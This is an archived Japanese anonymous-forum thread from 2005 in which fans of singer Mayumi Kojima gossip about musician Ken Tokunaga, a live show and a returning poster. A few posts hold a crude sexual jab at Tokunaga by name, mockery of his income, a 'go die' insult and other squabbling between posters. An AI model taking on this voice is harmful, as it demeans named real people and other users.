126 :無名し:2005/05/28(土) 21:05:54 ID:DammJZgi
徳永憲いま叩かれてますよ?

127 :名無しの歌姫:2005/05/28(土) 21:20:17 ID:tbe11YKj
【エキを】徳永憲のおちんちん【とばし】

128 :無名し:2005/05/28(土) 21:31:28 ID:DammJZgi
127その絵描ける?^^

129 :名無しの歌姫:2005/05/29(日) 01:55:30 ID:diTqsAcI
>>88を見てオフィシャルを覗いてみた。
自ら管理してるんだな。
なんか見ててカワイソウ。痛々しい。


そんなことより今度のライブ
ずんいちと手紙手渡した人との戦いが激化する予感。
熱いレポ待ってますw

130 :名無しの歌姫:2005/05/29(日) 02:00:57 ID:diTqsAcI
そういえばprinの復帰(若しくは偽の登場)も重なってるし、なんだか暗雲立ちこめてきた感

131 :名無しの歌姫:2005/05/29(日) 20:49:49 ID:SQqgC8/C
板移転で糞スレ化が進行したな

132 :prin ◆2Y9Fklqkrw :2005/05/29(日) 21:48:51 ID:ancAM7U0
>>130
何が暗雲だよ。失礼な奴め。
罰として、明日、プレイガーリーを口ずさみながら電車に乗り込め。


133 :無名し:2005/05/30(月) 00:11:41 ID:D17+dzBy
月収13万の徳永とはめてろ

134 :名無しの歌姫:2005/05/30(月) 00:32:34 ID:pkMix9oJ
>>94
市ね

135 :名無しの歌姫:2005/05/30(月) 00:50:20 ID:pkMix9oJ
ああ。アンカ間違えた
prinな

136 :prin ◆2Y9Fklqkrw :2005/05/30(月) 06:35:29 ID:5VRIRAYl
>>135
おまえ、普段の生活でもそんな感じなの?幼稚で間抜けで挙動不審者っぽいな。
ってか寸一?
>>133
思うに小島麻由美も月収低いんじゃないかと....

137 :名無しの歌姫:2005/05/30(月) 20:13:40 ID:0ThlZL32
おはぢきタソ まだここみてるかなぁ

138 :名無しの歌姫:2005/05/31(火) 01:39:15 ID:6Fr79WUV

    ,へ_,,__へ
   /;;;;;;;;;;;;;;;;;;;ヽ
  彡● ●;;;;;;;ミ
   |/▼ヽ;;; ;;;;;ミ
   ヽ_^__ノ,,,,;;;;;;;;ミ
   /;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ミ
   |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ミ
  /;;;;ri;;;;;;;;;;;;;;;;ヽ;;;;;;;;ミ
  し′|;;;;;;;;;;;;;;;;;;ヽ、;;;;i
.    |;;;;;;;;;;;;;;;;;;;;;;;|`^′
    |;;;;;;;;;;;;;;;;;;;;;;;;;|
.    |;;;;;;;;/\;;;;;;;;| ただならぬ雰囲気にレッサーパンダも立ち上がりました
    |;;;;;;/  ヽ;;;;;|
    ノ;;;;;」   ノ;;;;;|
    比/   `


139 :名無しの歌姫:2005/05/31(火) 20:18:52 ID:9wOQhH7p
映画の日である明日、コジマユファンのみんなはもちろん例の映画見に行くんだよな?

140 :名無しの歌姫:2005/06/01(水) 19:06:31 ID:Od1/wrE/
眼鏡っ子つじあやのか

141 :名無しの歌姫:2005/06/02(木) 01:01:34 ID:phBl/v0m
眼鏡っ子って響きがいいねー

142 :無名し:2005/06/02(木) 02:12:22 ID:swgmm47E
小島は今彼氏おるん?

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)